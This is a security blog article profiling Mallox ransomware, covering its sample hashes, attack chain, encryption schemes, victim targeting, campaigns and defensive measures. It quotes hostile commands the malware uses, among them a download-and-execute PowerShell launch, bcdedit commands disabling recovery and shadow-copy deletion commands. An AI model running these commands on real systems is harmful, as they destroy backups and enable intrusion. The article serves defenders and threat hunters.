Table of Contents
Mallox ransomware, also identified by names such as Fargo, TargetCompany, and Tohnichi, is a significant and evolving threat in the cybersecurity landscape. Operating as a Ransomware-as-a-Service (RaaS), Mallox has been active since June 2021, showcasing continuous development and an increasing number of detected samples. This article provides a comprehensive technical overview of Mallox, tracing its history, detailing its operational methods, analyzing its complex encryption schemes, and outlining effective defense strategies. The primary goal is to equip security professionals with the necessary knowledge to combat this persistent and adaptive threat.
Origins & Evolution
Mallox ransomware's origins trace back to June 2021, initially characterized by attacks targeting specific organizations. Early variants exhibited unique naming conventions, with samples tailored to victims using distinct file extensions such as .architek, .avast, .bitenc, .exploit,.FARGO2, .FARGO3, .xollam and appending the victim’s names as the extension. This period marked its emergence as a targeted threat, focusing on bespoke attacks.
|
Filename
|
Extension
|
MD5
|
First Submission
|
|---|---|---|---|
|
avast.exe
|
.avast
|
05d549a84583747d88f874b4b1f16787
|
May 31, 2021
|
|
architek.exe
|
.architek
|
0e1c42ddc08d0d6769b02e1b8b1c7653
|
Jun 1, 2021
|
|
iis6.exe
|
.[victim_name]
|
e6147c32f31e0752c0f33c19aaf8c283
|
Aug 17, 2021
|
|
cman.exe
|
.[victim_name]
|
0b213a0e55f6b99c8d17ef6e80141589
|
Sep 2, 2021
|
|
sqlserver.exe
|
.exploit
|
534954d4e6814dbb44eb47179b83d942
|
Jan 7, 2022
|
|
sqlserver.exe
|
.FARGO2
|
5c39447a2c3349926f928033e0a495d3
|
Jan 26, 2022
|
|
sqlserver.exe
|
.FARGO3
|
ac3e99d8c57ba639478421e9d89f47dc
|
Mar 24, 2022
|
|
sqlserver.exe
|
.mallox
|
21c257a72f0b53254d78b2d2963d024f
|
Jul 20, 2022
|
|
sqlserver.exe (v1A)
|
.mallox
|
778a451d9c119597645ba4b6c1d6c406
|
Aug 04, 2022
|
|
sqlserver.exe (v1B)
|
.mallox
|
c54a665f5179a44d7c6789038ff53753
|
Aug 15, 2022
|
|
sqlserver.exe (v1C)
|
.mallox
|
c8b5e99c539f7b711ba6b6577f1f834f
|
Aug 24, 2022
|
|
sqlserver.exe (v1D)
|
.mallox
|
672b45154c56336c9f5d42a505f62338
|
Sep 02, 2022
|
|
sqlserver.exe (v1E)
|
.mallox
|
96170b3ff79d5756244c514af5b80f08
|
Sep 04, 2022
|
|
sqlserver.exe (v1F)
|
.mallox
|
a68a8fd675454f0921b63a45b513c2a3
|
Sep 06, 2022
|
|
sqlserver.exe (v1G)
|
.mallox
|
90d4333c3a82b65b7b5d2d6516b45389
|
Sep 08, 2022
|
A significant shift occurred around 2022, potentially indicating a change in ownership or operational strategy. The ransomware adopted the more generic "Mallox" branding and began to be offered under a Ransomware-as-a-Service (RaaS) model. This transition was marked by advertisements on dark web forums, such as RAMP, seeking experienced affiliates. This period marked the beginning of multi-extortion techniques, with operators threatening to publish stolen victim data.
Since 2022 the RaaS is using affiliate IDs hardcoded in the trojan's body and reported to C&C via the HTTP parameter "user=".
Interviews with individuals claiming to be associated with Mallox have provided further insights, although the veracity of these claims remains subject to scrutiny. These interviews suggest a focus on targeting larger, wealthier organizations and a preference for working with experienced penetration testers. Learn about ethical hacking for free.
Tactics & Techniques
Mallox ransomware employs a sophisticated multi-stage attack chain, leveraging a combination of techniques to compromise, persist, and ultimately encrypt victim data.
Initial Access: A common infection vector is the exploitation of vulnerabilities in internet-facing Microsoft SQL (MS-SQL) and PostgreSQL servers. The attackers often utilize brute-force attacks or dictionary attacks against weak credentials on these database servers. Other observed methods include spam campaigns with malicious attachments and exploitation of vulnerabilities in software like IP-Guard. Read more about identifying vulnerabilities.
Payload Delivery: After gaining initial access, the attackers typically use PowerShell scripts to download and execute subsequent payloads. This often involves a multi-stage process, with an initial script downloading a first-stage payload, which then retrieves the second-stage payload (the Mallox ransomware itself). A common command sequence used is:
cmd /c powershell.exe -ep bypass -e [Base64 Encoded PowerShell Script]Another file named system.bat is downloaded by threat actors, and saves it as tzt.bat. The file tzt.bat is then used to create a user named SystemHelp and enable the remote desktop (RDP) protocol.
Defense Evasion & Anti-Analysis: Mallox implements several techniques to evade detection and hinder analysis:
* Disabling Windows Recovery Environment: Commands like bcdedit /set {default} bootstatuspolicy ignoreallfailures and bcdedit /set {default} recoveryenabled no are used to prevent system recovery.
* Deletion of Shadow Copies: vssadmin delete shadows /all /quiet is executed to eliminate shadow copies, preventing data restoration.
* Stopping and removing SQL-related services:
* Clearing application, security, setup, and system event logs:
* Modifies file permissions using commands like: takeown.exe, cmd.exe, icacls.exe, etc.
* Termination of Specific Processes: The ransomware terminates processes associated with security software, databases, and other applications that might interfere with encryption.
* Bypasses Raccine: If Raccine anti-ransomware is present, it deletes its registry key to bypass it. Understanding Windows Registry.
Encryption Process: Mallox employs a complex, multi-layered encryption scheme that has evolved over time:
* Original Version: Used Elliptic Curve Cryptography (ECC) for key generation, Elliptic-curve Diffie–Hellman (ECDH) for key agreement, and ChaCha20 for data encryption. A "technical buffer" was used to store cryptographic information.
* Recent Versions: Shifted to using master public keys, CTR_DRBG for key generation, and AES-256 in GCM mode for encryption. The technical buffer structure has been expanded. The vulnerability in using RtlGenRandom was fix in v1F.
* Drive Enumeration: Mallox enumerates drives and excludes specific folders and file extensions from encryption to maintain system stability.
Communication with C&C Server: Before and after encryption, Mallox communicates with the attacker's command and control (C&C) server. Information transmitted includes the victim ID, computer name, domain name, encrypted disks, and external IP address. Learn more about threat intelligence.
Targets or Victimology
Mallox ransomware's targeting strategy is characterized by a focus on financial gain and, potentially, geopolitical motivations.
Financial Gain: The primary motivation is financial, with ransom demands ranging from thousands to tens of thousands of dollars. The operators specifically target companies with revenues exceeding $10 million, indicating a focus on maximizing profits.
Espionage (Potential): While primarily financially driven, the targeting of specific industries (like manufacturing, professional/legal services, and wholesale/retail) could suggest a secondary interest in data theft for espionage purposes.
Targeted Industries: Mallox has been observed targeting a broad range of sectors, including manufacturing, professional and legal services, and wholesale/retail. This suggests an opportunistic approach, targeting organizations with weak security postures regardless of their specific industry.
Geographic Distribution: While attacks have been observed globally, certain regions, including Brazil, Vietnam, and China, have seen higher concentrations of victims. However, the RaaS model allows affiliates to target organizations in various locations, making the geographical distribution dynamic. The operators specifically target organizations in the US, CA, AU, UK, and DE, explicitly avoiding education, government, and healthcare.
Attack Campaigns
Mallox ransomware has been linked to several notable attack campaigns:
Mid-2021: Initial attacks targeting specific organizations, often using customized file extensions.
2022: Shift to the "Mallox" branding and the adoption of the RaaS model. Increased activity and the emergence of a data leak site.
July 2023: A significant increase (174%) in Mallox activity was reported, highlighting the growing threat.
Late 2023 - Early 2024: Continued activity, with reports of attacks globally across various industries. A Linux variant has emerged from around mid-2023.
November 2024: A high-profile attack occurred on Blue Yonder, a major supply chain management solutions provider. Read more about supply chain attacks.
December 2024: A new ransomware group, FunkSec, emerges and starts to take responsibity for a high number of attacks using the ransomware.
Defenses
Protecting against Mallox ransomware requires a multi-layered approach, focusing on prevention, detection, and response:
Secure Remote Access: Implement strong passwords and multi-factor authentication (MFA) for all remote access points, particularly RDP and VPN connections.
Patching and Vulnerability Management: Regularly update all software, especially internet-facing applications like MS-SQL servers, to address known vulnerabilities. Understanding patch management strategy.
Endpoint Protection: Deploy robust endpoint security solutions, including Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR), with ransomware protection capabilities enabled. Learn more about SOAR vs SIEM vs XDR.
Network Security: Implement network segmentation to limit the lateral movement of attackers within the network. Use firewalls and intrusion prevention systems (IPS) to monitor and block malicious traffic.
Security Awareness Training: Educate employees about phishing and social engineering techniques to prevent initial access via malicious emails.
Data Backup and Recovery: Regularly back up critical data to secure, offline locations. Test the restoration process to ensure data can be recovered quickly in case of an attack.
Threat Hunting: Proactively hunt for indicators of compromise (IOCs) within the network, focusing on unusual behavior, defense evasion techniques, and lateral movement.
Focus on Detection: Prioritize detecting key behaviors like Ingress Tool Transfer, Inhibit System Recovery, and Data Encrypted for Impact. Specifically:
* Monitor for PowerShell or Cmd.exe downloading data with "IWR" or "Invoke-WebRequest" and "DownloadData".
* Monitor command-line activity for vssadmin deleting shadows or PowerShell using Get-WmiObject Win32_Shadowcopy | ForEach-Object ($_.Delete();).
* Detect suspicious data exfiltration and ransomware-like file encryption patterns.
Conclusion
Mallox ransomware represents a persistent and evolving threat, driven by a financially motivated RaaS model. Its sophisticated attack techniques, including the exploitation of MS-SQL server vulnerabilities, multi-stage payload delivery, and advanced encryption schemes, require organizations to implement robust, multi-layered defenses. Continuous monitoring, proactive threat hunting, and a strong focus on security fundamentals, such as patching and secure remote access, are crucial for mitigating the risk posed by Mallox and other similar ransomware threats. The ongoing development of new variants, including a Linux version, underscores the need for constant vigilance and adaptation in the face of this evolving threat landscape.
Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this.
You may also like these articles:
Ransomware Payments Drop 35% in 2024 as Law Enforcement Disrupts Cybercrime
International Cybercrime Takedown: Four European Hackers Arrested in Phuket Ransomware Operation
AI-Driven Ransomware FunkSec Targets 85 Victims in December 2024
Russian Ransomware Hackers Exploit Microsoft Teams as Fake Tech Support Scam
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- March 3, 2025
- March 3, 2025
- March 3, 2025
- March 3, 2025
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- March 3, 2025
- March 3, 2025
- March 3, 2025
- March 3, 2025
